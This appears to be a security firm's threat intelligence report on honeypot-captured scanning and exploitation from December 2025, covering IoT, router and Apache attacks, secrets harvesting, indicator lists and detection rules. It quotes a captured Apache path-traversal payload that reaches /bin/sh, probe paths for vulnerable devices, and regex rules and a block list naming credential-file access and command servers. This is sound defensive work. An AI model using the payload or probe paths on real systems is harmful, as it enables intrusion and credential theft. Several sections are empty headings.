Assessment: Rondo represents opportunistic mass scanning targeting legacy vulnerabilities in IoT devices. The embedded email signature and use of decade-old CVEs suggests low-sophistication operators. Primary risk is to unpatched routers and IoT devices that may be enrolled into DDoS botnets or cryptomining operations.

Observed Campaign: IoT & Network Device Exploitation

Threat Type: Multi-CVE Device Targeting
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 965+

Baysec honeypots captured 965+ exploitation attempts targeting IoT devices, network equipment, and exposed management interfaces. Attackers systematically probe for vulnerable Hikvision cameras, GPON routers, D-Link devices, and enterprise infrastructure.

Hikvision SDK Reconnaissance (CVE-2021-36260)

Vulnerability: Scanning for Command Injection endpoint
CVSS: 9.8 CRITICAL
Events: 18

Attackers probe for the /SDK/webLanguage endpoint to identify Hikvision cameras vulnerable to CVE-2021-36260. All captured requests were GET-based reconnaissance - no command injection payloads observed.

Request Pattern:

1
2

GET /SDK/webLanguage HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46

GPON Router Reconnaissance

Scanning for: GPON Home Gateway vulnerabilities (CVE-2018-10561)
Events: 47

1

GET /GponForm/diag_Form?images/

Probing for vulnerable GPON routers. No command injection payloads observed.

D-Link HNAP Reconnaissance

Scanning for: D-Link HNAP interface
Events: 30

1
2

GET /HNAP1
GET /HNAP1/

Probing for D-Link routers with HNAP enabled. No SOAPAction exploitation payloads observed.

Apache Solr Reconnaissance

Scanning for: Apache Solr instances
Events: 109

Docker Registry Reconnaissance

Scanning for: Exposed Docker registries
Events: 63

1
2

GET /v2/_catalog
GET /containers/json

Probing for unauthenticated Docker API access.

SAP NetWeaver Reconnaissance (CVE-2025-31324)

Scanning for: Vulnerable metadatauploader endpoint
CVSS: 10.0 CRITICAL
Events: 24

1

GET /developmentserver/metadatauploader

Probing for SAP NetWeaver instances. No file upload payloads observed.

GeoServer Reconnaissance (CVE-2024-36401)

Scanning for: GeoServer instances
CVSS: 9.8 CRITICAL
Events: 18

1

GET /geoserver/web/

Probing for GeoServer installations. No SQL injection payloads observed.

Apache Path Traversal (CVE-2021-41773 / CVE-2021-42013)

Vulnerability: Path Traversal → RCE via mod_cgi
CVSS: 9.8 CRITICAL
Events: 402

Attack Payload (captured):

1

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1

This traverses to /bin/sh on vulnerable Apache 2.4.49/2.4.50 servers.

QNAP NAS Exploitation (CVE-2024-21899)

Vulnerability: Improper Authentication (CVE-2024-21899)
CVSS: 9.8 CRITICAL
Events: 52

1

GET /cgi-bin/authLogin.cgi

Attackers probe for QNAP NAS devices vulnerable to authentication bypass allowing unauthenticated access to device management.

InfluxDB Information Disclosure (CVE-2019-20933)

Vulnerability: Authentication Bypass (CVE-2019-20933)
CVSS: 9.8 CRITICAL
Events: 42

1

GET /query?q=SHOW+DIAGNOSTICS

Attackers probe for unauthenticated InfluxDB instances to extract internal configuration, credentials, and time-series data.

Realtek SDK Router Exploitation (CVE-2021-35395)

Vulnerability: Buffer Overflow leading to RCE (CVE-2021-35395)
CVSS: 9.8 CRITICAL
Events: 42

Targets routers with Realtek SDK - common in low-cost SOHO devices.

Netgear Router Exploitation

Vulnerability: Command Injection (CVE-2016-1555)
Events: 22

1

GET /cgi-bin/main-cgi

Miscellaneous Router CGI Attacks

WinRM Exploitation

Protocol: Windows Remote Management
Events: 219
Period: Dec 17 → Dec 26

1
2

POST /wsman HTTP/1.1
User-Agent: Python WinRM client

Assessment: Coordinated scanning campaign from Asian IP addresses targeting Windows hosts with exposed WinRM. Pattern suggests botnet-controlled scanning infrastructure.

Observed Campaign: Environment & Secrets Harvesting

Threat Type: Credential Theft / Reconnaissance
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 1,883+

Baysec honeypots captured 1,883+ requests targeting environment files, Git repositories, and cloud credentials. This represents systematic automated scanning for exposed secrets in web applications.

Environment File Scanning

Total Events: 1,761

Git Repository Exposure

Total Events: 122

Top Credential Harvesters

Note: 78.153.140.x subnet shows coordinated Russian-nexus scanning with multiple IPs from same /24 block.

Detection Rules

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Environment file access
GET.*\.env($|[./\?])
GET.*/\.env\.(local|production|staging|bak|save|old|backup)
GET.*\.env\.(zip|rar|tar\.gz|7z)

# Git exposure
GET.*\/\.git\/(config|index|HEAD|objects|refs)

# AWS credentials
GET.*\/\.aws\/(credentials|config)
GET.*/config/aws_settings

Assessment: Environment file scanning is fully automated and targets both development artifacts (.env.example) and production secrets. The systematic approach to backup file extensions (.bak, .save, .zip) indicates sophisticated tooling. Immediate risk to exposed deployments - attackers can obtain database credentials, API keys, and cloud access tokens.

MITRE ATT&CK Mapping

Execution

Persistence

Defense Evasion

Credential Access

Lateral Movement

Discovery

Command and Control

Initial Access

Reconnaissance

Resource Development

Collection

Indicators of Compromise

Network Indicators

React2Shell (CVE-2025-55182) - Extended IoCs (Dec 17-27, 2025) - 223 events, 26 IPs:

RedTail / PHP CGI (CVE-2024-4577) - Extended IoCs (Dec 17-27, 2025) - 1,276 events, 30+ IPs:

Rondo Botnet (Mirai Variant) - IoCs:

IoT & Network Device Exploitation - IoCs:

Cisco VPN (AnyConnect) Probing - IoCs (73 events, 19 DigitalOcean IPs):

Environment & Secrets Harvesting - IoCs (360 events):

SSH Brute Force - Top Attackers (395K+ events):

SMTP Open Relay Probing - 2,600 events:

DNS Reconnaissance - 1,355 events:

Other Campaigns:

Email/Sender Indicators (Phishing)

User-Agent Signatures

URL Indicators

File Indicators

Malicious Packages

Browser Extensions (GhostPoster)

Remove and reset passwords if installed:

• Free VPN Forever
• screenshot-saved-easy
• weather-best-forecast
• google-translate-pro-extension
• dark-reader-for-ff

Recommendations

Immediate Actions

Detection Signatures

WAF/IDS Rules (React2Shell CVE-2025-55182):

1
2
3

Block if:
  HTTP POST AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

HTTP Header Indicators (React2Shell):

Path-Based Detection (WAF/IDS):

1
2
3
4
5

.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*

Hunt Queries:

• File: /tmp/x.sh, weball.sh on web servers
• User-Agent: libredtail-http
• Connections to: 94.154.35.154, 193.142.147.209:12323

Network IOCs (Quick Block List):

1
2
3
4
5
6
7
8

94.154.35.154       # React2Shell staging
193.142.147.209     # React2Shell C2 (port 12323)
178.16.55.224       # RedTail C2
163.5.148.15        # RedTail scanner
141.98.80.175       # ClickFix C2
zkcall.net          # MacSync distribution
103.39.64.54        # SMTP brute force
87.251.78.220       # SMTP phishing

Assessment Confidence Levels

Conclusion

Key Judgments:

1. Supply chain is the primary attack vector for targeting developers and security professionals. npm, PyPI, and browser extension stores require continuous monitoring.

2. Steganography has become mainstream in criminal operations. Multiple independent campaigns (ClickFix, GhostPoster) adopted image-based payload delivery within the same period.

3. Code signing provides insufficient trust. Threat actors use signed and notarized macOS applications to bypass Gatekeeper, rendering signature-only trust models obsolete.

4. Developer targeting is strategic, not opportunistic. Webrat operators deliberately pivoted from game cheats to fake exploit repositories, recognizing the higher value of security researcher credentials.

5. State-sponsored actors remain active. Both APT37 (Artemis) and Contagious Interview demonstrate North Korean continued focus on credential theft and intelligence gathering.

6. Legacy vulnerabilities remain actively exploited. Baysec honeypots captured mass scanning for Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and Apache path traversal (CVE-2021-41773) - vulnerabilities years old but still profitable for attackers.

7. Geographic threat concentration persists. Russia (1.1M+ events) and Egypt (2.4M+ events) remain dominant sources of credential harvesting and brute force attacks, with captured credentials revealing compromised enterprise infrastructure.

Bottom Line: The boundary between “legitimate” open-source platforms and malware distribution has effectively dissolved. Defenders must extend monitoring to developer ecosystems and treat GitHub, npm, PyPI, and browser stores as potential attack vectors with the same rigor applied to traditional threat sources. Additionally, patching legacy vulnerabilities remains critical - attackers continue exploiting years-old CVEs at scale.

References

Closed Source Intelligence

Baysec CTI - proprietary threat intelligence platform providing real-time ransomware tracking, leak site monitoring, dark web surveillance, and credential exposure detection.

Baysec Intelligence AI - AI-assisted analysis for report enrichment, IOC correlation, and threat actor attribution.

Baysec Sensors - Distributed honeypot network capturing SSH/SMB/RDP/MSSQL/SMTP/DNS attacks, credential harvesting attempts, phishing distribution attempts, and exploit delivery.

Open Source Intelligence (OSINT)

Threat Research Reports

Vulnerabilities